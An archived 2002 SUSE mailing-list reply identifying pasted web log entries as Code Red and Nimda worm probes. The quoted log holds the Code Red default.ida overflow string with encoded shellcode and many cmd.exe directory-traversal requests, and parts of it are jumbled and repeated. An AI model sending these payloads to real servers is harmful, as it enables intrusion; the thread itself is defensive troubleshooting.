Mailinglist Archive: opensuse (3644 mails)
| < Previous | Next > |
Re: [SLE] web log
- From: James Bliss <bliss@xxxxxxxxx>
- Date: Tue, 12 Mar 2002 17:46:34 -0600
- Message-id: <HFPLB0NZX685SOB6TPUQ34ZZWVRD0.3c8e935a@familyroom>
This is the Code Red / Nimda attack signatures. You can just ignore them
since you are not at risk. I know, they really clutter up the logs though.
I do not think there is a way to keep them out of the log, on the security list
they went around on this and I do not remember any specific resolution
which would keep them out of the log files. (anyone know of a way to
avoid logging these entries?)
Jim
03/12/02 05:19:04 PM, Landy Roman <landy@xxxxxxxxxxxxxxx> wrote:
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNN
since you are not at risk. I know, they really clutter up the logs though.
I do not think there is a way to keep them out of the log, on the security list
they went around on this and I do not remember any specific resolution
which would keep them out of the log files. (anyone know of a way to
avoid logging these entries?)
Jim
03/12/02 05:19:04 PM, Landy Roman <landy@xxxxxxxxxxxxxxx> wrote:
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
i saw these entries in my weblog anything i can do against this
61.182.248.223 - - [12/Mar/2002:07:47:44 -0500] "GET
/default.ida?
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u
0000%u00=a HTTP/1.0" 400 331 64.133.27.115 - -[12/Mar/2002:10:23:19
-0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115- -
[12/Mar/2002:10:23:20 -0500] "GET /MSADC/root.exe?/c+dirHTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET-
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 -
[12/Mar/2002:10:23:20 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir"GET
HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:20 -0500]
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476"GET
64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:21 -0500]
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:21 -0500]"GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt
/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - -294
[12/Mar/2002:10:23:21 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET476
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401
64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GETNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
202.5.152.215 - - [12/Mar/2002:12:01:15 -0500] "GET
/default.ida?
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u
0000%u00=a HTTP/1.0" 400 331 146.155.10.241 - -[12/Mar/2002:12:50:04
-0500] "GETNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
/default.ida?
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u
0000%u00=a HTTP/1.0" 400 331 212.205.99.248 - -[12/Mar/2002:13:07:02
-0500] "GETNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
/default.ida?
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u
0000%u00=a HTTP/1.0" 400 331
--
To unsubscribe send e-mail to suse-linux-e-unsubscribe@xxxxxxxx
For additional commands send e-mail to suse-linux-e-help@xxxxxxxx
Also check the FAQ at http://www.suse.com/support/faq and the
archives at http://lists.suse.com
| < Previous | Next > |